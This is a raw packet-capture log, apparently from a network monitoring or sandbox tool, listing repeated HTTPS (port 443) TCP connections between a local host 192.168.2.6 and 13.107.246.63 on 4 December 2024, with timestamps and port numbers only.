                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.523894072 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.524100065 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.524117947 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.685689926 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.691255093 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.691279888 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.692162037 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.692176104 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.959562063 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.960318089 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.960350037 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.960830927 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:28.960839987 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138020992 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138093948 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138194084 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138462067 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138484001 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138499975 CET49768443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.138505936 CET4434976813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.142607927 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.142669916 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.142754078 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.143752098 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.143773079 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.411508083 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.411576986 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.411640882 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.411974907 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.411995888 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.412007093 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.412014008 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.415510893 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.415574074 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.415661097 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.415851116 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.415858984 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.489422083 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.490130901 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.490168095 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.490622044 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.490629911 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.984746933 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.984827995 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.984926939 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.985383987 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.985409975 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.985424995 CET49770443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.985433102 CET4434977013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.991784096 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.991842985 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.991906881 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.992122889 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.992140055 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.996159077 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.996881008 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.996907949 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.998203993 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:29.998213053 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.254096031 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.254744053 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.254781008 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.255250931 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.255259991 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448268890 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448340893 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448395967 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448929071 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448954105 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448975086 CET49771443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.448981047 CET4434977113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.452765942 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.452801943 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.452868938 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.453171968 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.453183889 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.696686983 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.696753979 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.696805954 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.697261095 CET49772443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.697283030 CET4434977213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.703330994 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.703387022 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.703463078 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.703655958 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:30.703671932 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.001096010 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.014475107 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.014506102 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.015006065 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.015012026 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.208398104 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.252052069 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.258882999 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.258904934 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.259390116 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.259401083 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.462515116 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.462588072 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.462650061 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.595863104 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.595925093 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.595946074 CET49773443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.595953941 CET4434977313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.663465977 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.663546085 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.663631916 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.710509062 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.710553885 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.710571051 CET49774443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.710577965 CET4434977413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.718265057 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.776510000 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.776565075 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.777004004 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.777012110 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.879740000 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.879821062 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.879884005 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.904742956 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.904802084 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.904872894 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.908133984 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.908159018 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.913117886 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:31.913142920 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185466051 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185544968 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185630083 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185921907 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185949087 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185964108 CET49775443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.185969114 CET4434977513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.189189911 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.189227104 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.189316034 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.190649986 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.190665960 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.562153101 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.562787056 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.562823057 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.563337088 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:32.563344002 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.022864103 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.022936106 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.023037910 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.024034977 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.024060965 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.024074078 CET49777443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.024080992 CET4434977713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.027194023 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.027231932 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.027308941 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.027527094 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.027543068 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.093286037 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.094017029 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.094038963 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.094502926 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.094508886 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553307056 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553410053 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553500891 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553814888 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553838015 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553857088 CET49776443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.553864002 CET4434977613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.557009935 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.557080030 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.557169914 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.557339907 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.557359934 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.703641891 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.704265118 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.704291105 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.704813004 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.704818010 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.705337048 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.705652952 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.705672979 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.706020117 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.706027985 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.981828928 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.983412027 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.983449936 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.984134912 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:33.984143019 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.156346083 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.156420946 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.156526089 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.157480955 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.157552958 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.157594919 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.187640905 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.187678099 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.187695980 CET49778443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.187701941 CET4434977813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.189325094 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.189363003 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.189383030 CET49779443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.189388990 CET4434977913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.438793898 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.438854933 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.438986063 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.468322992 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.468384027 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.468415022 CET49780443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.468421936 CET4434978013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.504569054 CET49783443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.504637957 CET4434978313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.504710913 CET49783443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.513340950 CET49783443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.513389111 CET4434978313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.515338898 CET49784443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.515409946 CET4434978413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.515476942 CET49784443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.515650988 CET49784443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.515662909 CET4434978413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.516338110 CET49785443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.516388893 CET4434978513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.516441107 CET49785443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.627363920 CET49785443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.627434015 CET4434978513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.820481062 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.842272043 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.842310905 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.843259096 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:34.843271971 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.272542953 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.272628069 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.272747040 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.273005962 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.273031950 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.273046970 CET49781443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.273055077 CET4434978113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.276328087 CET49786443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.276385069 CET4434978613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.276465893 CET49786443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.277019978 CET49786443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.277034998 CET4434978613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.413094997 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.415385962 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.415416956 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.415889025 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.415898085 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.875535965 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.875643015 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.875751019 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.876147985 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.876168966 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.876189947 CET49782443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.876197100 CET4434978213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.879658937 CET49787443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.879734039 CET4434978713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.879930973 CET49787443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:35.880143881 CET49787443192.168.2.613.107.246.63
